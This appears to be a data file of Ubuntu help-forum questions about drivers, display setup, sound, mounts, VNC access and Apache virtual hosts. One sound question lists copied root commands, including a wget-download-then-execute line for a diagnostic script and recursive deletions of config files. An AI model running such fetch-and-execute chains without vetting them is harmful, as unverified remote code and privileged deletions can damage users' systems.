135458	unity components debugging	following up on my question here , i would like to ask about best-practices for debugging additions to the unity components . integrating apps into unity requires many components : service files , desktop files , dbus clients , dbus servers , etc . with so many independent components involved , i have a bit trouble finding a good way to look for the problem when something is not working . but since many developers seem to be able to develop in this environment , there are probably tools / workflows that i 'm missing . as an example : quickly debug , which opens a python debugger does not help at all for lens development , unless the problem is directly in the code of the lens ( which is easier found with simple unit tests ) . if the problem is in a service file , this does not help at all . i have had problems for example with whitespace in an application name in the .desktop file , which lead to a program not being listed in the sound menu ( i think , maybe it was another menu ... ) . so : how are you debugging lenses , launchers , indicators , hud methods ... ? is there a tool to check the integrity of a .service file ? is there a tool to check the integrity of a .desktop file ? is there a tool to see if there are collision in .desktop/.service files ? ( e.g . several .service files supplying the same dbus service ) is there a way to watch the communication between a specific lens in the dash and the supporting lens-service ? can i test lenses without installing them ?
135463	why is wine installed automatically with i386 and amd64 versions in 12.04 ?	when i install wine in a fresh 12.04 ubuntu the installer , synaptic in my case , insists on installing both versions : i386 and amd64 ... why ? i do n't get this - and it seems to get me into trouble when installing stuff via wine on my 64bit system wine looks for gnomekeyring libs in the directory for i386 libs ! when i am running a 64bit system there should be no need for wine i386 , should there ?
135470	dual monitors with two nvidia gpu 's	i have two gtx 275s sli 'd , when i connect both monitors to same card it allows me to enable twinview , and it works . but when i want to connect each monitor to different cards , i lose the option of twinview and my secondary screen is just white and when i mouse over it my mouse turns into an x . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 13:37:33 utc 2012 section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` lg electronics m2762d '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell e193fp '' horizsync 31.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' # horizsync source : edid , vertrefresh source : edid endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' # generated from default endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 1280 0 screen 1 `` screen1 '' leftof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 275 '' busid `` pci:2:0:0 '' option `` nologo '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 275 '' busid `` pci:3:0:0 '' option `` nologo '' `` true '' endsection
135474	wifi stopped working in windows vista after using ubuntu demo cd	after trying the ubuntu 12.04 demo cd , wifi has stopped working on my windows vista machine . before demo cd , wifi worked fine inside windows during demo cd ( and every time i use it ) , wifi works fine inside ubuntu 12.04 . since first time i used demo cd , wifi does not work anymore inside windows vista . windows says the hardware switch for wifi is off , but it is on ( and must be since it works under ubuntu ) rfkill list all shows no blocks inside ubuntu , but windows still says hardware switch is off ever since the first time i used demo cd from ubuntu rfkill unblock wifi has no effect sudo lspci -v shows network controller is intel pro/wireless 3945abg [ golan ] rev 02 and ethernet controller is realtek rtl8111/8168b pci express gigabit rev 01
135477	how can i scale all images in a folder to the same width ?	i want to scale all images in a given folder to the same width ( but different appropriately scaled heights ) . how can i do this using a gui-based or command-line tool ? for bonus points , is it possible to restrict which images are scaled based on their initial width ( that is , only scale images that have a width > x and/or a width < y ) ?
135478	ubuntu 12.04 and hyper-v 2008 r2 scvmm - network cable unplugged	after attempting to install ubuntu desktop 32bit on our hyperv environment - which requires static ip addressing , ubuntu thinks the network cable is unplugged . it 's connected to the correct team nic in scvmm ( like 40 or so other servers ; which are all working fine ) but for some reason it does n't detect that the cable is `` plugged in '' . i 'm going to try ubuntu server 64-bit to see if that works . update - looks like server has the same problem .
135483	how to configure xrdp to start cinnamon as default desktop session	i was wondering if there is a way to make cinnamon 1.4 the default environment upon logging in to ubuntu 12.04 . i can install cinnamon 1.4 without any problems , but i am trying to run xrdp to log in from a windows machine and would like it to start `` cinnamon session '' instead of a unity session by default . the question is , how can i tell xrdp to use cinnamon instead of unity upon logging in ? xrdp seems to work much better than any vnc based servers .
135486	can you help me write a script to set a new default brightness for the screen/keyboard after login ?	on my macbook pro ubuntu alsways boots with ... keyboard brightness at maximum illumination screen brightness at maximum illumination ... both which i need almost never during normal usage . question instead of directly manipulating configuration files , i 'm thinking of a solution that would work like a script and set both brightness settings to a lower default . how might this be accomplished ? unfortunately , i have no experience in scripting and would be glad if you can help me out here . i 've figured out what needs to be done to change both the screen brightness and the keyboard backlight . can you help be to make this a script that is automatically run at login ? change keyboard backlight echo 130 | sudo tee -a /sys/class/leds/smc : :kbd_backlight/brightness ... where 255 is the maximum brightness and 0 is the lowest brightness . change screen brightness echo 42311 | sudo tee /sys/class/backlight/gmux_backlight/brightness ... where 4126 is the lowest brightness and 82311 the hightest . i 've noticed a another problem.. if i run echo 42311 | sudo tee /sys/class/backlight/gmux_backlight/brightness right after login , but then use the brightness buttons . the screen brightness settings first reset to maximum - and then the change get 's applied . this is seems messed up ...
135487	show only a single sticky note ?	i 'm using the built in gnome sticky notes app , which matches my needs perfectly* . but i ca n't figure out how to show only 1 single note without showing all the notes . there 's nothing obvious in preferences/settings ; are there any tricks or hacks that will allow me to show only a single note ? i 'd also be ok with showing all the notes , then hiding them individually . *please no suggestions for tomboy or other programs - they 're all way too heavy for my needs . i do n't need linking or formatting or search . i just need plain old tiny notes with the ability to show only one at a time . thanks !
135490	how to sync music and pictures with nokia n9 ?	i bought a nokia n9 , and want to sync my music and pictures to the device . which software has the ability to do this ? i know there is a way through dual boot or virtualbox , but i 'm interested in software for ubuntu .
135491	how to delete new kernel & to go back in old one ?	os : ubuntu 12.04 kernel : 3.3.5-030305-generic-pae device : dell inspiron 1464 . recently i am having a problem that is : i use a wimax device whose chipset is beecem bcsm250 wimax . it is zte ax226 wimax modem . it is working fine on ubuntu 11.04 . but in 12.04 it works good but sometimes when i just insert this modem my screen goes full black & system gets hanged . nothing is working . so i updated my kernel from 3.2.0-24generic to 3.3.5-030305-generic-pae manually by downloading deb files . now in this new kernel my wlan card is not working ( chipset : bcm4312 ) while it was running smoothly on my previous kernel . i tried fwcutter & firmware from software centre , but it didnt worked . now i need both wimax & wlan working on my pc . plz help me guys i m in a big problem ... .. lspci output : 03:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 )
135494	how to resolve pycuda installation error `` /usr/bin/ld : can not find -lcuda '' ?	i am installing pycuda2011.2.2 on ubuntu 11.10 , but ca n't complete it . cuda is 4.0 . when i do : $ make -j 4 i get this error : /usr/bin/ld : can not find -lcuda /usr/bin/ld : skipping incompatible /usr/local/cuda/lib/libcurand.so when searching for -lcurand why this error ? i think that cuda is 32 bit on 64 bit machine . but i ca n't see whether it 's 32 bit or 64 bit . also , can anyone share code to make `` gcc 4.4 '' as priority , just for my account and not all account ?
135496	bind mounting read-only using fstab on ubuntu ?	i need to remount one directory ( /src ) as readonly in another location ( /dst ) . this can be done like this : $ sudo mount -- bind /src /dst $ sudo mount -o remount , ro /dst however , i would like to use /etc/fstab to have the mount taking place at boot time and have seen different suggested solutions to this problem , e.g . /src /dst none bind 0 0 /src /dst none remount , bind , ro 0 0 which unfortunately leaves the directory mounted read/write on my system and this /src /dst none bind 0 0 /dst /dst none remount , bind , ro 0 0 which will issue an error when trying to mount /dst : mount : /dst not mounted already , or bad option the above solutions supposedly works on different distros , but unfortunately not on ubuntu 10.04.4 lts ( kernel 2.6.32-41-server ) . any ideas how to accomplish this apart from placing the mount commands into /etc/rc.local ?
135498	what is the purpose of the ubuntu one folder ?	using ubuntu one , i can sync my home folders with ubuntu one , which is great . but what is the purpose of the ubuntu one folder that is in my home folder ? does it have special privileges that my other folders do n't have ? why would i use it ? and can it safely be removed ?
135499	`` rm '' does n't accept internal command as a paramter	why does n't this work ? rm $ ( gsettings get org.gnome.desktop.background picture-uri | awk ' { gsub ( `` file : // '' , '' '' ) ; print $ 0 } ' ) rm : can not remove `\'/home/foggy/obrazky/wallpapers/24/dark_oxygen_by_falco101.png\ '' : no such file or directory perhaps there is some character that rm does n't accept ?
135507	is 10.04 lts still supported by the ubuntu desktop advanced ?	is 10 . 04 lts still supported by the ubuntu desktop advanced ? if yes , until when ?
135509	how would i boot into the ubuntu and windows recovery modes if i removed the options to do so from the grub menu ?	i can use grub-customizer to edit which options appear in the grub menu . i was thinking of removing everything except the option to boot into ubuntu and into windows . if i was to do this how could i boot into the recovery modes of these two operating systems if i needed to ?
135511	can i use kubuntu live cd to install kubuntu-desktop package on a ubuntu installation ?	i have got ubuntu and kubuntu live cd iso . i installed ubuntu on my machine . but i want to install kubuntu-desktop package to try kde . but this is a huge internet download , which i do not afford . can i use my existing kubuntu-live-cd to install kubuntu-desktop package on my existing ubuntu installation ? .
135515	set nomodeset in usb installation ( efi loader with iso )	i 'm working with the studyblast solution to creating a live usb on os x. i managed to get ubuntu booted but the screen looks like a corrupt/glitch image . i can just about make out the clock on the bottom right and a few icons . i 've been told that this is easily fixed and that nomodeset needs to be set for the graphics card . but all the solutions i find are for ubuntu systems installed to hard drives . where you can cd in and edit the grub file - how do you do this is if it 's in an iso ?
135517	what to do against game performance drop in 12.04 when using unity ( 3d ) ?	i experience a huge drop in game performance since my fresh install of ubuntu 12.04 my pc consists of an nvidia geforce gtx 460 , amd phenom ii x4 965 cpu and 4gb of ram and i use nvidias proprietary driver . i mainly play heroes of newerth by using their linux client . i do this since ubuntu 9.10 and i had never experienced any performance issues when using the proprietary nvidia driver . my fps was always maxed to the vsync frame cap of 60 . since i run ubuntu 12.04 i get around 30-45 fps and game experience in general is very laggy . i know that there are a lot of people having issues with nvidias 295.40 driver , which is sadly installed by default in ubuntu 12.04 . so i manually installed the latest stable 295.49 , latest beta 302.07 and even the older version 295.33 used in ubuntu 11.10 ( where i never had any issues with performance ) . it was a waste of time since i was experiencing the same performance problems with all 4 driver versions . when i use unity 2d my fps is back to 60 and overall game performance is great . so i only have those issues when running ubuntu 12.04 's version of unity . i also tried to delete my .config and .compiz-1 folders in the home directory but still game performance is a mess when using unity . i do n't know what to try next ... does anybody know how i can further debug the issue ? maybe how i can provide more data to better analyse the problem ? maybe try to fiddle with some compiz settings ? this performance regression is really frustrating and i am thinking of just downloading heroes of newerth 's windows client and going back to dual boot since this is simply unacceptable . any help appreciated .
135520	how to subscribe to all wiki.ubuntu.com page changes	i can subscribe to each wiki.ubuntu.com page individually but some users are notified on each change . how to add myself to be also notified on each change ? and how to remove ? im still getting even after removing myself .
135527	why is software slow to install using ubuntu software center ?	i 've recently installed 12.04 on my pc but i am finding that it takes an eternity to install software using the software center . my pc has more than enough power to handle this ( i 'm running a 64 bit machine ) , so it 's not a hardware issue . i 've seen a similar thread to this but no clear answer on how to remedy the problem was given . it took me 30 minutes to install a game i downloaded , this was on top of the download time , and my pc was effectively unusable during this period . other software i 've downloaded ( skype , wine etc ) were slow to install . any help would be greatly appreciated .
135531	how do i disable the screen saver in 12.04 system wide ?	i have a similar problem as this post : how do i turn off the screen saver using the command line ? however , these new commands ( and likewise if i set the options from the gui ) only seem to work if i am actually normally logged in to x. i am using an xbmc-only desktop session , and when i type this command : gsettings get org.gnome.desktop.screensaver idle-activation-enabled i get `` true '' ( which explains why it keeps going blank after 10 mins ) , but when i type this command : gsettings set org.gnome.desktop.screensaver idle-activation-enabled false i get the following : ** ( process:4909 ) : warning ** : command line 'dbus-launch -- autolaunch=b3ac84dfb4159464a026d84900000006 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n is there any way of altering this setting system wide ?
135536	12.04 installation leaves me with a blank screen , changing boot options does n't help	the problem of seeing simply a blinker seems to be occurring quite frequently online , but i have not found any solution that has helped . i am trying to install from wubi , and previously i 've had to uninstall and reinstall ubuntu many times to try to get it to work ; i also have had a working copy of 11.10 on my machine ( asus u46e ) before , but had to uninstall it after my computer froze during an upgrade to 12.04 , and was rendered useless despite what solutions online tried to tell me . at this point , i almost had 11.04 working because i was able to edit the boot option to xforcevesa and remote quiet splash during startup , but attempting to update-grub [ this time i mistakenly updated to quick splash xforcevesa instead of removing quick splash ] gave me an `` alloc magic broken at 0xsomething '' . newer versions do n't get me much further . with the boot options set to `` quiet splash `` , i have the same problem . removing quiet splash and going with one of the many other options out there simply gets me to the booting node activating processors , or something to that effect , and stops moving there . is there any other solution out there ? and why would it not work now when it did the first time ?
135537	no sound after opening the sound settings menu	i just installed ubuntu 12.04 lts . after i opened `` sound settings '' menu , i ca n't hear any sound , it just disappears . music and video still play but without sound and no concerning-audio error message appears . i was forced to reinstall system in order to hear music again . can anybody know what 's going on and how to fix it ? sound settings window is empty , no sound cards/ports are shown . no play through devices
135538	how to change alt+tab window highlight color in unity 2d	i have ubuntu 12.04 , and i run unity 2d ( so i can run all of my monitors with xinerama ) . a problem that i have is when i hit alt+tab , it highlights the new [ active ] window with a white border . well , if the window i want is behind another window that has a lot of white ( like a web browser that is opened to a page with a white background ( i.e . 80 % of the web ) ) , i ca n't tell which window i 've alt-tab 'd to . where can i change the color and thickness of the window when it has been highlighted via alt+tab ? i 'd like a nice , thick orange or red background . is this a ccsm thing ? or do i need to alter via the metacity files ? thanks in advance .
135540	what is the 'whoopsie ' process and how can i remove it ?	on one of my machines i have a process running called `` whoopsie '' . i 'm running 12.04 server and never specifically installed anything with this name . google seems to imply that it has something to with error logs but i 'm not finding too much information . the fact that i did n't manually install it and the 3 other servers i checked did in fact have no such running process or executable made me a bit confused . does anyone know what the `` whoopsie '' process is ? does anyone know what packages might have installed it ? the server is quite plain , it has a lamp stack , samba and print servers and the nagios nrpe plugin , nothing more installed , just standing there being a nice backup-server . some more info : $ whoopsie -h usage : whoopsie [ option ... ] help options : -h , -- help show help options application options : -f , -- foreground run in the foreground and user pid % cpu % mem vsz rss tty stat start time command whoopsie 913 0.0 0.4 24448 2092 ? ssl may07 0:00 whoopsie and $ sudo cat /etc/passwd | grep whoop whoopsie : x:107:118 : :/nonexistent : /bin/false
135543	empathy refusing to connect	i have configured empathy with facebook and gmail just after installing ubuntu 12.04 . it worked flawlessly for few days and one fine day it crashed . after that when ever i am opening empathy it is failing to connect to gmail and facebook ( i have not checked any other im services ) . after the crash i removed my account configurations and added once again but still facing the same issue . any pointer to fix issue is appreciable .
135544	what should i start with after installing ubuntu via wubi ?	i am absolutely new to ubuntu and i do n't really know what to start with . could you give me some ideas ? what applications should i install first ? i install it on a laptop with window 7 on it . i often use it for photo and video editing , coz i love taking photos , as well as audio editing ( i am using adobe audition on win 7 ) , and also making powerpoint slide ( which i want to do the more coz sb said it 's much easier to make slide via linux ) , thz a lot .
135547	how do i set up mod_mono on 11.10 ?	i have a amazon web services server with ubuntu 11.10 installed i have insalled mono and i have successfully dployed ad launched a .net webservice with xsp4 . now i want to host it on that server . i am trying to figure out how to set up apache and mod_mono to use . i was told apache is already installed by default . but i do n't know where to find it . i am a complete newbie with linux ! ! help please !
135548	how to add ibus to start up applications ?	i use keyboard input methods program for inputting tamil . i need to manually start it everytime i need to use it . how can i add it to start up ? i do n't want it asking me this everytime i start it : '' keyboard input methods ( ibus daemon ) has not been started . do you want to start it now ? '' and also this dialog : '' ibus has been started ! if you can not use ibus , please open system menu - > system settings - > language support and set the `` keyboard input method '' to `` ibus '' , then log out and back in again . ''
135551	automatic login option is missing in 12.04	automatic login option is missing from system settings > user accounts , how can i solve this ? i either ca n't set the automatic login by editing /etc/lightdm/lightdm.conf [ seatdefaults ] autologin-user=x autologin-user-timeout=0 user-session=ubuntu greeter-session=unity-greeter after restart login screen asks for my password . there is a thread in ubuntu forums http : //ubuntuforums.org/showthread.php ? p=11889259 . it 's in lubuntu forum , but there are ubuntu users afected too . i 'm runing 12.04 ( precise ) 64-bit with kernel linux 3.2.0-24-generic . excuse my bad english , please .
135565	how do i disable on-screen notifications for brightness only ?	i have remapped my brightness control keys ( fn+keys ) to 'home ' and 'end ' . it works as expected , but i also get the brightness control notifigation bubble in upper right corner . the only thing that annoys is that popup . can i disable it somehow ?
135569	hplip 3.12.4 plugin installer failing to install in lubuntu	hplip 3.12.4 plugin installer fails with : qgtkstyle was unable to detect the current gtk+ theme . how can i make this work in lubuntu to get my printer working ? plugin installer can be found here : http : //www.openprinting.org/download/printdriver/auxfiles/hp/plugins/ i used : hplip-3.12.4-plugin.run
135573	gconf error : no d-bus daemon running ? ! how to reinstall or fix ?	after installing konquerer and restarting my laptop i got the following error while trying to open , edit or access files as root from within terminal ( which is existencial for me ) . root @ linuxbox : /home/v2r # gnome-open /home/ ( gnome-open:2686 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally with the following error : no protocol specified autolaunch error : x11 initialization failed . gconf error : no d-bus daemon running root @ linuxbox : /home/v2r # no protocol specified could not parse arguments : can not open display : also it seems , that dbus is not installed properly anymore in /bin/ and /usr/bin/ see screenshot : how would i go about fixing this problem and thank you in advance ? ! ! ! thank you for your answer sircharlo ! it does not resolve the problem at all . please note , that it only happens while beeing root ! root @ linuxbox : /home/v2r # gnome-open /home/ ( gnome-open:5170 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-2rdcujrz9k : connection refused gconf error : no d-bus daemon running root @ linuxbox : /home/v2r # no protocol specified could not parse arguments : can not open display :
135582	when automount ntfs partition , all file were marked `` allow executing file as program ''	i edited /etc/fstab to automount ntfs partition , then all file were marked `` allow executing file as program '' . how can i fix it ? edit : when i double click any text file , it did n't show immediately , a dialog was displayed , and i must choose display option to view it in gedit .
135585	`` upgrade to 12.04 '' greyed out as option on 12.04 disc	i have 10.04.4 lts installed and have inserted a new 12.04 official disc to use for the upgrade , although when i get to the upgrade page on the disc , the option to upgrade from 10.04 to 12.04 is greyed out . is there anything i need to do first to allow this radio button to activate ? thanks for any tips !
135588	ubuntu 12.04 suspend not working fix	04 lts users ! if any of you are experiencing the same trouble as i did with the suspend more where the screen stays black after you turn your laptop back on please refer to my fix the last comment that i have posted on this forum : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/989674 ? comments=all p.s . only use the script as a fix if your machine turns back on from suspend and the screen is lit but remains black . this fix should get your gui and lock screen back . : - )
135591	is it necessary to connect via cisco vpn using my university account to go online ?	original title : bug with xisco vpn - it it necessary to connect via cisco vpn using my university-account in order to go online for all wireless networks in order to gain wireless access to my university network , i had to download and install the cisco vpn client . it worked fine under 11.10 and did so for two weeks on 12.04 . but since yesterday , i am unable to connect to my wireless network at home . first i have to connect via cisco vpn using my university account . this is quite annoying and i 'm unable to download apps via the software center when using the cisco vpn client . i really do n't know what happened , because it worked fine for two weeks and i did not change a thing .
135592	where are theme and compiz settings stored ?	which files in ~/ store settings for compiz , gtk and icons ? every new user uses files from etc\skel . i want , when i create a new user , for that user to use my gtk theme , compiz settings , icons and fonts by default .
135594	i 'm worried i 've accidentally deleted windows !	i installed ubuntu , and i installed it on a separate partition . for some reason though , i do n't get the os choices menu . i spoke to a friend about it ; he said that ubuntu should n't have deleted windows ( and everything on that drive ) because i put it on a separate partition . have i done something wrong ? is windows gone forever ? or have i made a mistake so my os menu choices wo n't show ? i did n't select the replace windows option , i definitely installed it on a separate partition . also , i ca n't check my windows os disk c : via my ubuntu partition , is this normal ?
135595	upgrade to 12.04 causes inactive desktop	i recently upgraded my ubuntu 11.10 to 12.04 . the upgrade happened successfully . now , on login screen , i cant do any thing except entering password . mouse pointer doesnt move and i cant select any option for login . anyhow , once i am login , desktop seems freezing and no any icon is active . no mouse movement . the only thing which i can do is ctrl-alt_del . and again the same problem . could some please help me out
135597	how can i change the size of the dash font ?	i 've just installed and configured ubuntu 12.04 on my machine . i 've changed all font sizes , with the myunity tool , and they 're now all set to the ubuntu font size 9 . however , i ca n't find anywhere in ubuntu a way to change the huge dash search/ui font . any idea on where i can change it ? any dconf/gconf setting option ? here are some screenshots , compare the size of the dash fonts to desktops apps . dash font : desktop font :
135601	how can i sync application between multiple computers ?	i have three laptops , all running 12.04 ( they were running 11.10 ) . i have backups working to ubuntu one for my primary laptop , and folder synchronization of my documents , pictures and music folders working to all three laptops . i like the idea of being able to work on a document on my primary laptop , head out with a netbook and do some quick work on the same document , then finish it up on the third and not worry whether i grab a netbook , a low-end laptop or the bigger , heavier one . i 'd like to keep applications synchronized across all three laptops . i saw where you can do that using the ubuntu software center , then click installed , file and synch between computers . when i do that - i do n't see my three laptops listed . when i log in to ubuntu one - i see all three laptops . i can synch my folders just fine . not sure how to synch my apps .
135602	i have permanent connections to canonical servers , what are they for and how can i turn them off ?	after the recent upgrade to 12 , i notice permanent connections to canonical servers . running netstat -tp gives : foreign address state pid/program name mulberry.canonical : http close_wait 6537/ubuntu-geoip-p alkes.canonical.co : http close_wait 6667/python alkes.canonical.co : http close_wait 6667/python why are there permanent connections and how could i stop this behavior ? and if this is intentional , who is responsible ? i would like to understand why this was done because to me it seems like a bad idea .
135607	copy to primary selection in vim	i tried `` +y and `` *y but both does n't seem to copy into the primary selection . note that vim -- version returns -clipboard . not sure what this means . also note that i 'm running vim in a terminal . so how do i copy text into the primary selection in vim ? goal is to copy text from vim into google chrome .
135611	why wo n't my laptop detect my vga cable after start-up ?	i plug the vga cable from my computer to the tv . after that , i turn the computer on . the display is shown on the tv but once the ubuntu login screen appears , my connection is then lost . are there any good suggestions on how to fix this ?
135615	update android phone os with ubuntu 12.04	how do i update an android phone from 2.2 froyo to 2.3 gingerbread with ubuntu 12.04 ? does this process require windows ? i am using ubuntu 12.04 on a core i3 machine . thanks in advance . ragv
135616	updating release versions before hardware is certified	my laptop , a thinkpad sl510 , is certified* on ubuntu 11.04 . i upgraded to 11.10 and then 12.04 . after a month long fight to keep a decent wifi signal and trying numerous fixes , i gave up and reinstalled 11.04 . however , now , i continually get notices to upgrade to 11.10 . my question is why would i want to update to 11.10 or 12.04 without those versions being tested against my hardware ? http : //www.ubuntu.com/certification/hardware/201011-6830/
135619	allow connections to vnc server only from specific ip addresses	i administrate an ubuntu 11.10 server . i 've installed tightvncserver on it so i can have a desktop environment on the server . my issue now is , i 'm running into issues with malicious people spamming the vnc server with authentication attempts . i 've strengthened up the password , but it 's still inconvenient as it restricts me from connecting as the person is using up all the authentication attempts . there are pretty much around 5 ip addresses that should be able to attempt to authenticate to the vnc server , this person is using proxies from romania , china , korea , etc . how can i accept authentication attempts to only the ip addresses i specify ? essentially , i want to do the opposite of this : how to deny vnc access to a particular ip ? and this with vnc instead : how can i allow ssh password authentication from only certain ip addresses ? any ideas ? thanks , brandon
135621	ubuntu 12.04 using uefi	i want to upgrade my machine with a new motherboard , ram and processor . i am planning on doing a clean install of ubuntu 12.04 . the motherboard i want to use is an asrock 970 extreme4 which uses an ami 32 mbit uefi bios . my question is , is there anything i have to watch out for during the installation process ? cause i have read that some people have trouble booting into ubuntu using a uefi bios . any advice ? i do n't want to spend all that money for the different parts only to find out that i can only use windows properly . thanks in advance
135626	windows-based network with ubuntu server ?	i 'd like to add an ubuntu server to a network including several windows7 machines . what must i do in order to allow the ubuntu server to be 'allowed ' to access the home directory on each one of the windows7 machines , and copy them over ( for backup purposes ) ? also , once i install mysql on the ubuntu server , how do i 'allow ' all the windows7 machines to connect to it ( i 'd like them to be able to query/update the databases etc ) ? please and thank you .
135629	how to add some additional dns search domains without ignoring the ones returned by dhcp ?	please provide : correct location to add my custom domain search option ( preferably appending it to the dhcp list , instead of prepending ) command to run to make the settings effective note : do not ask me to modify files that are auto-regenerated and overridden , like /etc/resolv.conf
135633	installed .pcf fonts not available	i 'm trying to install the font from http : //font.gohu.eu/ on 12.04 . it recommends the pcf font but when i install it , i do not see it in any applications ( gvim , gnome-terminal , gnome-tweak-tool ) . i tried the ttf as well but it still did n't work . i have n't had problems with this font installing before .
135642	does the hud work in lubuntu ?	i have a lubuntu install , and have noticed that the hud that goes along with something called unity does not appear when i tap alt . i learned about the hud from the notes about the most recent ubuntu patch , which i think was `` precise pangolin '' . that page has a small section about the hud , but i could n't find any links to talk about it more in depth . the patch notes indicated that it should have been installed automatically , and i was wondering if there are any known reasons it might not be working . i have looked through the existing questions and could not find a similar question . my only thought were that i run lubuntu , and that i have no idea what unity is . please advise .
135643	usb devices not regconized	i am using ubuntu 12.04 . when i mount a usb flash drive , my laptop does not recognise those devices . can you help me to solve this problem ? lsusb output : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bda:0158 realtek semiconductor corp. usb 2.0 multicard reader bus 001 device 003 : id 04f2 : b091 chicony electronics co. , ltd webcam bus 002 device 004 : id 7614:1236 if you need more details just ask : ( sorry but i really new in ubuntu > '' < give me some specific details please ... thanks
135648	do all linux programs have some kind of terminal command as well ?	do all linux programs have some kind of terminal command as well ? its seems many that i use do . and many seem like terminal commands can actually be more effective sometimes . i was just wondering if it was always programmed in to software to allow terminal commands for any given software . like , could you pick up anything and use it fully in a terminal ? ( like a messenger ) i am getting the idea that it 's up to the developer . if they want to incorperate the commands , they can , if not , they just have it as a gui program . i just was n't sure how it all worked .
135656	speakers are not working after upgrading to 12.04	the day before yesterday i upgraded my os from ubuntu 11.10 to 12.04 . and i was able to hear sound from my `` dell vostro - 3400 '' laptop for 24 hours only . but after that sound is coming through the headset only , not through speakers . i searched for solution and followed the instruction given in the sound troubleshooting help page . i have run the following commands : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 sudo apt-get -y -- reinstall install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; killall pulseaudio rm -r ~/.pulse* sudo usermod -ag `cat /etc/group | grep -e '^pulse : ' -e '^audio : ' -e '^pulse-access : ' -e '^pulse-rt : ' -e '^video : ' | awk -f : ' { print $ 1 } ' | tr '\n ' ' , ' | sed 's : , $ : :g'` `whoami` wget -o alsa-info.sh http : //www.alsa-project.org/alsa-info.sh & & chmod +x ./alsa-info.sh & & ./alsa-info.sh bash alsa-info.sh -- stdout # resulted in different driver version : 1.0.24 ( which actually should be 1.0.25 ) sudo apt-add-repository ppa : ubuntu-audio-dev/alsa-daily ; sudo apt-get update ; sudo apt-get install alsa-hda-dkms . cat /proc/asound/ { version , cards , devices , hwdep , pcm , seq/clients } sudo rm /etc/asound.conf sudo rm -r ~/.pulse ~/.asound* sudo rm ~/.pulse-cookie sudo apt-get update sudo apt-get install aptitude sudo aptitude install paman gnome-alsamixer libasound2-plugins padevchooser libsdl1.2debian-pulseaudio sudo lshw -short ls -lart /dev/snd cat /dev/sndstat lspci -nn lsusb sudo which alsactl sudo fuser -v /dev/dsp /dev/snd/* dpkg -s bin/slmodemd dmesg | egrep 'emu|probe|emu|alsa|alsa|ac97|udi|snd|ound|irmware' sudo /etc/init.d/sl-modem-daemon status sudo grep model /etc/modprobe.d/* sudo dmidecode|egrep 'anufact|roduct|erial|elease' lsmod | egrep 'snd|usb|midi|udio' aplay -l sudo alsa force-reload sudo lshw -c sound then i rebooted the system . but still i am not getting any sound through the speakers . have i omitted some commands or anything else ?
135658	adding subdomain to apache2 with a2ensite causes error : error : site domain.com does not exist !	i 'm trying to add subdomains to my home server . svn.domain.com trac.domain.com due to dynamic ip i use dyndns service , on top of that i have domain.com hosted somewhere else . i created cname for subdomains on remote host to point to my user.dyndns.org domain . so now when i visit either of subdomains : trac or svn , i see `` it works ! '' message . this done , i created two virtual host files under /etc/apache2/sites-enabled file1 : svn.domain.com and file2 : trac.domain.com contents : < virtualhost *:80 > servername trac.domain.com documentroot = /var/www/trac/repos < directory /var/www/trac/repos > order allow , deny allow from all < /directory > < /virtualhost > and < virtualhost *:80 > servername svn.domain.com documentroot = /var/svn/repos < directory /var/svn/repos > order allow , deny allow from all < /directory > < /virtualhost > but i get error : error : site trac.domain.com does not exist ! what am i doing wrong ?
135662	how to change menu shortcuts ?	im talking about shortcuts that appear in menus ( for example nautilus > file > new tab ctrl+t ) . i know i had to do something to edit those shortcuts in 10.04 with .gtkrc2.0 , but i forgot what it was . and it 's probably different with gtk3 .. i couldnt find anything about it , anywhere , maybe because they are n't called `` menu shortcuts '' .. so anyone ?
